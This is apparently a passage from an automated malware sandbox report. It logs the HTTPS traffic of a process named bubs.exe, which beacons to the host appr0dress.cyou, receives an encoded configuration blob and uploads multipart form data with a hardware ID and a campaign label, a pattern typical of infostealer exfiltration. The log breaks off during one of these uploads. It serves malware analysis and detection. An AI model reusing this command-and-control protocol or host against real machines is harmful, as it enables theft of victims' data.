CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2a%2Bg8pAadAHYm3tzMREk7AcvVZolrUhF%2BUVNVaWfDMIzMTCl6qnHmtJsUnt1HIRIeFUzyMIm%2B5ww%2BeJSjKyZBds4ePgnaj3jJHOvK0p5Q7KE3bT9RJ1mL6XSiS%2Fh0A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e58283d6c717291-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1801&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=776&delivery_rate=1563169&cwnd=218&unsent_bytes=0&cid=9c0b6759a5ce8561&ts=551&x=0"
2024-11-20 11:39:03 UTC	36	IN	Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 Data Ascii: 74PNGIHDR%V
2024-11-20 11:39:03 UTC	86	IN	Data Raw: ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a Data Ascii: PLTEz=tRNS@fpHYs+IDATc`qdIENDB`
2024-11-20 11:39:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49774	188.114.96.3	443	4140	C:\Users\user\AppData\Roaming\Extra\bubs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 11:39:05 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: appr0dress.cyou
2024-11-20 11:39:05 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-11-20 11:39:06 UTC	986	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 11:39:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=s7hotql0rp4qbdnmqo3icprs73; expires=Sun, 16-Mar-2025 05:25:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tw2TXd80VlZH5BHW%2FYBQ9bvzEV9Hdf%2BHVj72P%2BHHunMTERRjc5IGg66fmxGal4VSeDcJZi8YnqhQEkIfp15ZbzRiQmA8f0rXveHH9xm9ESJPMXV184yANBJNPNArWbel7uA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e58284eff3d42d3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1739&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=906&delivery_rate=1683967&cwnd=246&unsent_bytes=0&cid=e1354f03d37ee276&ts=977&x=0"
2024-11-20 11:39:06 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-11-20 11:39:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49785	188.114.96.3	443	4140	C:\Users\user\AppData\Roaming\Extra\bubs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 11:39:06 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: appr0dress.cyou
2024-11-20 11:39:06 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 49 52 69 61 46 69 2d 2d 63 72 79 70 74 31 38 6e 65 77 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=IRiaFi--crypt18new&j=
2024-11-20 11:39:07 UTC	987	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 11:39:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=56abpp96gdf9tbt2nql204vcb9; expires=Sun, 16-Mar-2025 05:25:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NRzjbJ75foOQ%2Fg2IlFHhx8Tn8x8rc1KaG0x9QTpH9h9nDdzZZQXSKjs7IHBeSAe1Aa9cn3SzcXK52xy%2FcnxDY%2Ftx4feZ9SxU63QAxKDeJvMOPbGIpe4xBiqAwjKnNCcRPuE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e582858aaf9178c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1480&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=951&delivery_rate=1932495&cwnd=139&unsent_bytes=0&cid=d5dd4fbf70d42425&ts=1038&x=0"
2024-11-20 11:39:07 UTC	382	IN	Data Raw: 31 64 38 62 0d 0a 78 54 4f 68 37 42 44 50 50 65 50 52 4a 55 64 61 69 4b 34 55 68 75 66 77 45 46 41 47 31 44 54 58 30 4f 32 70 6a 55 46 4c 79 61 65 2b 45 64 66 4f 4b 76 73 52 77 61 4a 41 5a 57 44 38 33 47 48 6a 79 39 4a 78 4e 43 54 75 55 72 61 38 6e 73 79 68 59 7a 32 6b 68 66 39 56 77 49 42 6a 71 68 48 42 74 46 31 6c 59 4e 50 56 4e 75 4f 4a 30 69 70 79 59 37 35 57 74 72 79 50 79 4f 59 75 4f 36 58 45 72 56 2f 47 68 48 57 73 57 59 4b 39 53 43 49 2f 37 63 39 2b 36 49 36 64 65 44 30 6b 2b 42 61 79 71 73 2b 54 72 77 77 75 76 63 61 49 55 74 4b 48 4d 72 49 52 6d 50 4e 41 4b 58 69 79 6a 48 58 6a 68 5a 78 32 4e 47 32 38 58 4c 2b 30 6a 73 33 6e 4d 53 4b 76 7a 36 31 52 78 59 56 2f 70 55 32 50 74 30 38 70 4f 65 66 50 4e 71 72 46 6c 57 70 79 50 50 59 46 68 37 47 65 32 Data Ascii: 1d8bxTOh7BDPPePRJUdaiK4UhufwEFAG1DTX0O2pjUFLyae+EdfOKvsRwaJAZWD83GHjy9JxNCTuUra8nsyhYz2khf9VwIBjqhHBtF1lYNPVNuOJ0ipyY75WtryPyOYuO6XErV/GhHWsWYK9SCI/7c9+6I6deD0k+Bayqs+TrwwuvcaIUtKHMrIRmPNAKXiyjHXjhZx2NG28XL+0js3nMSKvz61RxYV/pU2Pt08pOefPNqrFlWpyPPYFh7Ge2
2024-11-20 11:39:07 UTC	1369	IN	Data Raw: 78 4f 55 6e 4a 4b 62 44 70 31 47 44 77 44 4b 71 52 38 48 72 42 77 59 39 2b 73 74 36 38 73 65 6f 4d 69 30 71 72 78 61 79 76 73 2b 54 72 79 73 73 71 4d 61 73 58 73 43 47 65 62 39 66 6b 37 56 4b 49 43 72 73 79 58 6a 75 68 6f 42 34 50 47 4b 31 58 37 36 37 69 73 7a 72 59 32 66 72 77 72 38 52 6d 38 35 54 6f 46 53 4e 75 56 41 6c 65 50 57 43 62 36 53 43 6e 6a 4a 71 4a 4c 4a 58 73 62 4f 4c 78 65 45 6e 4a 61 33 4c 71 6c 37 46 68 48 4b 71 56 59 6d 37 52 69 67 7a 35 63 78 7a 36 59 47 55 66 6a 4e 68 39 68 6a 31 74 5a 65 4c 74 32 4d 48 72 4d 61 31 45 2f 61 4e 66 4b 4e 59 6c 2f 4e 59 61 79 47 71 79 33 71 6b 33 64 4a 38 4e 32 75 6b 56 36 65 33 67 64 6e 6a 4a 69 2b 6d 78 71 6c 52 78 6f 6c 2f 6f 31 6d 47 73 45 38 68 4f 65 54 41 66 4f 65 42 6b 54 4a 38 4a 4c 46 4f 39 65 72 Data Ascii: xOUnJKbDp1GDwDKqR8HrBwY9+st68seoMi0qrxayvs+TryssqMasXsCGeb9fk7VKICrsyXjuhoB4PGK1X767iszrY2frwr8Rm85ToFSNuVAlePWCb6SCnjJqJLJXsbOLxeEnJa3Lql7FhHKqVYm7Rigz5cxz6YGUfjNh9hj1tZeLt2MHrMa1E/aNfKNYl/NYayGqy3qk3dJ8N2ukV6e3gdnjJi+mxqlRxol/o1mGsE8hOeTAfOeBkTJ8JLFO9er
2024-11-20 11:39:07 UTC	1369	IN	Data Raw: 43 36 6f 79 4b 42 62 7a 59 6c 32 6f 56 61 4d 74 55 63 69 50 4f 2f 65 63 2b 32 4a 6e 6a 4a 38 4a 4c 46 4f 39 65 72 50 35 4f 67 31 4b 6f 54 47 74 6c 69 44 6b 54 79 30 48 34 61 2f 42 33 31 34 37 63 6c 2b 37 34 4f 61 63 69 42 68 75 46 32 30 75 49 6e 4b 34 69 38 76 71 38 53 6e 56 38 2b 4f 64 61 70 4e 6b 37 5a 42 4e 7a 4b 71 67 6a 62 6a 6e 64 49 71 63 6c 4b 6d 51 61 53 6b 7a 66 37 73 4c 53 65 73 30 2b 64 4f 6a 5a 63 79 71 6c 50 42 36 77 63 75 4f 4f 62 4c 66 75 4b 42 6d 6e 30 39 62 61 52 58 75 62 79 64 7a 4f 38 71 4a 36 54 4a 72 6c 7a 45 67 33 6d 6e 55 6f 57 30 52 6d 56 32 71 73 74 75 70 4e 33 53 52 43 4a 70 75 6e 69 2b 76 6f 61 4c 38 47 30 77 36 38 4b 72 45 5a 76 4f 64 71 46 58 69 37 78 4f 4c 7a 4c 6c 78 58 62 73 6a 4a 74 78 4d 6d 69 77 56 37 6d 2b 67 73 37 73 Data Ascii: C6oyKBbzYl2oVaMtUciPO/ec+2JnjJ8JLFO9erP5Og1KoTGtliDkTy0H4a/B3147cl+74OaciBhuF20uInK4i8vq8SnV8+OdapNk7ZBNzKqgjbjndIqclKmQaSkzf7sLSes0+dOjZcyqlPB6wcuOObLfuKBmn09baRXubydzO8qJ6TJrlzEg3mnUoW0RmV2qstupN3SRCJpuni+voaL8G0w68KrEZvOdqFXi7xOLzLlxXbsjJtxMmiwV7m+gs7s
2024-11-20 11:39:07 UTC	1369	IN	Data Raw: 57 34 48 39 72 4f 64 61 45 66 32 66 4e 4c 4a 6a 54 69 77 33 44 74 69 5a 68 37 4f 57 69 39 55 72 6d 37 69 73 33 75 4a 69 79 71 77 61 74 62 78 59 31 78 6f 6c 43 4f 75 77 64 72 65 4f 33 55 4e 72 7a 46 74 32 55 35 61 72 41 57 71 76 79 57 69 2b 67 76 61 66 4f 46 71 31 6a 46 69 48 65 68 58 6f 65 37 51 69 30 38 36 38 70 77 35 34 71 57 64 7a 4e 72 73 6c 71 37 75 49 37 4b 34 79 67 6d 6f 4d 44 6e 48 34 4f 4a 61 75 30 48 77 59 4a 45 4d 79 2f 36 77 44 62 37 79 34 73 79 4e 57 6a 32 44 76 57 7a 6e 63 48 6c 4c 53 79 6b 77 4b 52 65 78 49 4e 30 6f 56 57 49 75 30 45 71 4d 66 6a 50 65 75 71 43 6e 48 34 38 61 62 78 56 75 50 4c 42 69 2b 67 37 61 66 4f 46 69 31 62 4f 6f 48 6d 68 57 4d 47 73 43 54 78 34 37 63 41 32 76 4d 57 65 65 44 35 74 74 6c 2b 77 75 6f 54 43 36 69 49 69 72 Data Ascii: W4H9rOdaEf2fNLJjTiw3DtiZh7OWi9Urm7is3uJiyqwatbxY1xolCOuwdreO3UNrzFt2U5arAWqvyWi+gvafOFq1jFiHehXoe7Qi0868pw54qWdzNrslq7uI7K4ygmoMDnH4OJau0HwYJEMy/6wDb7y4syNWj2DvWzncHlLSykwKRexIN0oVWIu0EqMfjPeuqCnH48abxVuPLBi+g7afOFi1bOoHmhWMGsCTx47cA2vMWeeD5ttl+wuoTC6iIir
2024-11-20 11:39:07 UTC	1369	IN	Data Raw: 4e 6c 7a 4b 71 55 38 48 72 42 79 4d 33 34 38 39 35 35 59 79 65 66 7a 64 74 73 31 65 7a 74 6f 58 42 37 79 55 76 71 73 43 74 55 73 4b 45 65 36 70 58 68 72 42 56 5a 58 61 71 79 32 36 6b 33 64 4a 62 4e 58 61 34 52 76 57 74 77 64 4b 76 4a 43 58 72 6e 65 64 56 79 59 46 32 71 6c 4f 48 74 6b 45 6f 4f 65 58 4e 64 75 75 42 6d 58 73 30 5a 62 74 54 75 4c 61 64 77 65 51 73 4a 61 4c 4a 71 68 47 4e 7a 6e 57 31 48 39 6e 7a 64 69 67 32 35 4d 74 67 70 4a 72 63 61 33 4a 6a 75 68 62 74 38 6f 37 48 34 43 41 6d 71 4d 61 6d 57 39 47 63 66 71 52 58 68 4c 39 4d 4b 7a 37 34 79 6e 6e 74 68 70 46 37 4e 57 79 36 58 4c 61 31 7a 34 57 76 4a 44 48 72 6e 65 64 79 31 4a 35 2f 37 55 44 50 71 67 63 69 4e 4b 71 55 4e 75 79 49 6d 6e 67 32 59 37 74 52 73 37 75 64 77 75 6f 74 4b 61 2f 4f 71 46 Data Ascii: NlzKqU8HrByM348955Yyefzdts1eztoXB7yUvqsCtUsKEe6pXhrBVZXaqy26k3dJbNXa4RvWtwdKvJCXrnedVyYF2qlOHtkEoOeXNduuBmXs0ZbtTuLadweQsJaLJqhGNznW1H9nzdig25MtgpJrca3Jjuhbt8o7H4CAmqMamW9GcfqRXhL9MKz74ynnthpF7NWy6XLa1z4WvJDHrnedy1J5/7UDPqgciNKqUNuyImng2Y7tRs7udwuotKa/OqF
2024-11-20 11:39:07 UTC	1369	IN	Data Raw: 71 56 61 50 75 6b 68 6c 64 71 72 4c 62 71 54 64 30 6c 4d 70 5a 37 70 62 39 61 33 42 30 71 38 6b 4a 65 75 64 35 31 33 4e 69 33 4b 6e 57 59 57 32 51 53 38 39 36 73 64 31 36 34 47 55 64 6a 31 6b 76 56 2b 30 74 49 72 42 35 43 55 6b 71 4d 4f 68 45 59 33 4f 64 62 55 66 32 66 4e 6e 50 6a 58 6d 79 7a 62 37 79 34 73 79 4e 57 6a 32 44 76 57 35 67 38 2f 6f 49 79 53 6f 7a 61 4a 56 79 59 74 79 70 55 32 4a 73 30 41 33 4b 75 72 46 63 2b 69 47 6b 6e 59 30 62 62 42 56 73 66 4c 42 69 2b 67 37 61 66 4f 46 69 6c 33 45 70 33 57 32 48 35 37 39 58 6d 55 2f 35 6f 77 75 70 49 53 5a 65 44 31 70 74 56 43 32 75 59 72 42 37 69 51 68 70 74 65 6b 58 73 79 4b 63 71 4a 5a 68 37 4a 49 49 7a 2f 6a 7a 58 37 6a 78 64 77 79 4e 58 7a 32 44 76 57 63 69 4d 6a 72 59 7a 62 6c 33 4f 64 57 7a 38 34 Data Ascii: qVaPukhldqrLbqTd0lMpZ7pb9a3B0q8kJeud513Ni3KnWYW2QS896sd164GUdj1kvV+0tIrB5CUkqMOhEY3OdbUf2fNnPjXmyzb7y4syNWj2DvW5g8/oIySozaJVyYtypU2Js0A3KurFc+iGknY0bbBVsfLBi+g7afOFil3Ep3W2H579XmU/5owupISZeD1ptVC2uYrB7iQhptekXsyKcqJZh7JIIz/jzX7jxdwyNXz2DvWciMjrYzbl3OdWz84
2024-11-20 11:39:07 UTC	344	IN	Data Raw: 4b 56 4b 4e 54 2b 71 38 7a 69 6b 6e 64 49 71 63 6c 47 31 57 4c 75 31 6d 64 71 69 42 44 2b 68 77 72 64 57 31 49 45 79 34 78 2b 48 38 78 39 32 64 71 72 49 5a 36 54 64 77 69 42 70 4d 65 55 42 35 65 43 51 68 66 5a 6a 50 2b 75 64 39 52 2b 44 6e 44 4c 31 48 38 61 77 56 54 63 2b 36 64 70 31 6f 37 75 73 56 53 68 70 73 45 47 6b 6a 4c 48 4d 39 53 34 76 76 4e 54 72 52 4d 43 41 66 4b 70 4a 77 66 30 48 4b 6e 69 79 39 54 61 73 78 61 30 38 63 6e 7a 32 44 76 57 48 6a 4d 58 68 4a 44 2b 36 69 49 42 4c 7a 6f 68 6c 76 42 2f 50 38 30 46 6c 59 4c 71 43 4e 75 43 55 30 69 70 69 4e 75 30 44 35 75 58 66 6d 66 42 74 4d 4f 76 54 35 77 6d 52 77 44 4b 2f 48 39 6e 7a 41 43 59 71 2b 4d 70 31 38 6f 62 56 54 41 78 4b 73 56 43 77 74 5a 2b 4a 77 53 67 39 72 49 58 70 45 63 7a 4f 4b 70 51 66 Data Ascii: KVKNT+q8zikndIqclG1WLu1mdqiBD+hwrdW1IEy4x+H8x92dqrIZ6TdwiBpMeUB5eCQhfZjP+ud9R+DnDL1H8awVTc+6dp1o7usVShpsEGkjLHM9S4vvNTrRMCAfKpJwf0HKniy9Tasxa08cnz2DvWHjMXhJD+6iIBLzohlvB/P80FlYLqCNuCU0ipiNu0D5uXfmfBtMOvT5wmRwDK/H9nzACYq+Mp18obVTAxKsVCwtZ+JwSg9rIXpEczOKpQf
2024-11-20 11:39:07 UTC	1369	IN	Data Raw: 32 36 65 31 0d 0a 68 56 53 4d 37 2f 4d 38 78 32 72 75 52 5a 44 39 72 76 56 65 4c 6a 4b 48 47 37 69 41 6e 36 66 53 78 58 4e 4f 4e 64 36 70 68 76 37 31 41 4d 54 2f 6b 79 6e 61 6b 79 39 4a 39 63 6a 79 50 46 76 33 79 73 49 57 76 4f 32 6e 7a 68 5a 4a 53 7a 59 42 31 75 30 37 4d 6b 46 45 6f 4e 2b 48 4e 4e 71 72 46 6c 44 4a 71 4e 50 67 57 73 61 50 50 6b 37 39 78 63 76 36 57 38 41 47 52 6b 54 79 30 48 35 66 7a 48 33 64 32 71 74 34 32 76 4d 58 56 66 44 39 6c 74 56 69 32 6f 4a 33 4e 37 44 55 71 37 50 75 5a 63 4d 36 46 66 71 42 51 69 6f 31 35 42 44 58 68 77 48 76 72 6a 71 78 4d 4a 32 65 34 57 4c 4b 6b 6e 6f 75 68 59 79 62 72 6e 5a 34 52 69 38 35 4e 34 78 2b 5a 38 78 39 6c 44 65 6e 43 65 4f 4f 54 67 7a 38 54 61 62 31 61 75 4c 32 45 69 36 46 6a 4c 2b 75 64 39 78 2b 44 Data Ascii: 26e1hVSM7/M8x2ruRZD9rvVeLjKHG7iAn6fSxXNONd6phv71AMT/kynaky9J9cjyPFv3ysIWvO2nzhZJSzYB1u07MkFEoN+HNNqrFlDJqNPgWsaPPk79xcv6W8AGRkTy0H5fzH3d2qt42vMXVfD9ltVi2oJ3N7DUq7PuZcM6FfqBQio15BDXhwHvrjqxMJ2e4WLKknouhYybrnZ4Ri85N4x+Z8x9lDenCeOOTgz8Tab1auL2Ei6FjL+ud9x+D
2024-11-20 11:39:07 UTC	1369	IN	Data Raw: 69 43 6f 30 45 6d 42 74 54 6e 65 75 4b 43 69 48 55 30 51 70 59 57 2b 2f 4b 41 69 37 63 61 61 65 4f 46 6d 42 2b 44 6c 6a 4c 31 48 37 53 77 53 53 73 2f 2f 4e 30 37 77 5a 4b 52 59 6a 52 6e 39 68 6a 31 74 4d 2b 54 76 32 31 70 72 39 54 6e 43 5a 50 63 4b 66 67 4d 31 75 4d 56 4f 6e 62 7a 6a 47 43 6b 33 63 41 38 63 6e 62 32 44 76 58 31 6a 4e 6e 39 4a 53 71 39 78 75 42 76 2f 61 68 78 76 46 57 67 76 6c 63 69 42 74 54 5a 64 65 71 4c 6c 57 51 6a 4a 50 67 57 75 76 4c 58 38 71 39 72 5a 61 33 47 73 52 48 38 77 44 4b 31 48 39 6e 7a 63 69 59 32 35 4d 74 67 39 63 69 30 63 53 4e 75 6c 31 75 6c 74 63 2b 46 72 79 56 70 38 35 62 70 45 63 65 66 4d 76 55 50 30 2b 67 53 64 6d 2b 36 6e 6d 6d 71 6e 4e 4a 6b 63 6a 7a 6b 47 50 57 67 7a 35 4f 76 5a 43 71 35 31 36 46 53 31 59 30 31 6b Data Ascii: iCo0EmBtTneuKCiHU0QpYW+/KAi7caaeOFmB+DljL1H7SwSSs//N07wZKRYjRn9hj1tM+Tv21pr9TnCZPcKfgM1uMVOnbzjGCk3cA8cnb2DvX1jNn9JSq9xuBv/ahxvFWgvlciBtTZdeqLlWQjJPgWuvLX8q9rZa3GsRH8wDK1H9nzciY25Mtg9ci0cSNul1ultc+FryVp85bpEcefMvUP0+gSdm+6nmmqnNJkcjzkGPWgz5OvZCq516FS1Y01k

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49797	188.114.96.3	443	4140	C:\Users\user\AppData\Roaming\Extra\bubs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 11:39:08 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=KT2GK415IYJ4L User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12834 Host: appr0dress.cyou
2024-11-20 11:39:08 UTC	12834	OUT	Data Raw: 2d 2d 4b 54 32 47 4b 34 31 35 49 59 4a 34 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 34 44 38 45 31 31 37 39 34 35 34 43 37 41 43 35 34 39 46 44 35 43 30 32 32 32 38 44 42 33 31 0d 0a 2d 2d 4b 54 32 47 4b 34 31 35 49 59 4a 34 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 54 32 47 4b 34 31 35 49 59 4a 34 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 49 52 69 61 46 69 2d 2d 63 72 79 70 74 31 38 6e 65 77 0d 0a 2d 2d 4b 54 32 47 4b 34 Data Ascii: --KT2GK415IYJ4LContent-Disposition: form-data; name="hwid"84D8E1179454C7AC549FD5C02228DB31--KT2GK415IYJ4LContent-Disposition: form-data; name="pid"2--KT2GK415IYJ4LContent-Disposition: form-data; name="lid"IRiaFi--crypt18new--KT2GK4
2024-11-20 11:39:09 UTC	985	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 11:39:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7mp976o39e81rg5siq4eblmii8; expires=Sun, 16-Mar-2025 05:25:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uP4AVr1x3fPTL3WDtFvLdosm01hA6D26CoNNdpCgeLCvUHX3wIFNxiYTcqS5SkUL3jl091eN3yuBcmhTdgkw%2FPYn3Kklyjo9F2oz3WSNS90UsSlZkqy1w4PTB2qSIleXvCA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e582862dcc1159b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1660&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2834&recv_bytes=13768&delivery_rate=1748502&cwnd=252&unsent_bytes=0&cid=45ee4aedf9315920&ts=532&x=0"
2024-11-20 11:39:09 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-20 11:39:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49805	188.114.96.3	443	4140	C:\Users\user\AppData\Roaming\Extra\bubs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 11:39:09 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=5815TOUR55MD2GJJFDN User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15116 Host: appr0dress.cyou
2024-11-20 11:39:09 UTC	15116	OUT	Data Raw: 2d 2d 35 38 31 35 54 4f 55 52 35 35 4d 44 32 47 4a 4a 46 44 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 34 44 38 45 31 31 37 39 34 35 34 43 37 41 43 35 34 39 46 44 35 43 30 32 32 32 38 44 42 33 31 0d 0a 2d 2d 35 38 31 35 54 4f 55 52 35 35 4d 44 32 47 4a 4a 46 44 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 38 31 35 54 4f 55 52 35 35 4d 44 32 47 4a 4a 46 44 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 49 52 69 61 46 69 2d 2d 63 72 Data Ascii: --5815TOUR55MD2GJJFDNContent-Disposition: form-data; name="hwid"84D8E1179454C7AC549FD5C02228DB31--5815TOUR55MD2GJJFDNContent-Disposition: form-data; name="pid"2--5815TOUR55MD2GJJFDNContent-Disposition: form-data; name="lid"IRiaFi--cr
2024-11-20 11:39:10 UTC	989	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 11:39:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qi56nims5mjilr6fat5pceu62f; expires=Sun, 16-Mar-2025 05:25:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wS0gCI2aUH57LbuInVKuyMMVCb7ayFSHhsMBcig9YmhGZMI8gaINu2EvUzAPVD0DCRmCyrLaRMaG169a%2FYvPyjMxEovBp49NZecZSHEWaRLpC2DgpiPs%2Fl%2BqIeDQaC3wNYw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e58286a8c767c78-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2038&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2836&recv_bytes=16056&delivery_rate=1364485&cwnd=252&unsent_bytes=0&cid=34e62838598ad5a6&ts=544&x=0"
2024-11-20 11:39:10 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-20 11:39:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49816	188.114.96.3	443	4140	C:\Users\user\AppData\Roaming\Extra\bubs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 11:39:11 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=BVCOQ7H6XG07 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19932 Host: appr0dress.cyou
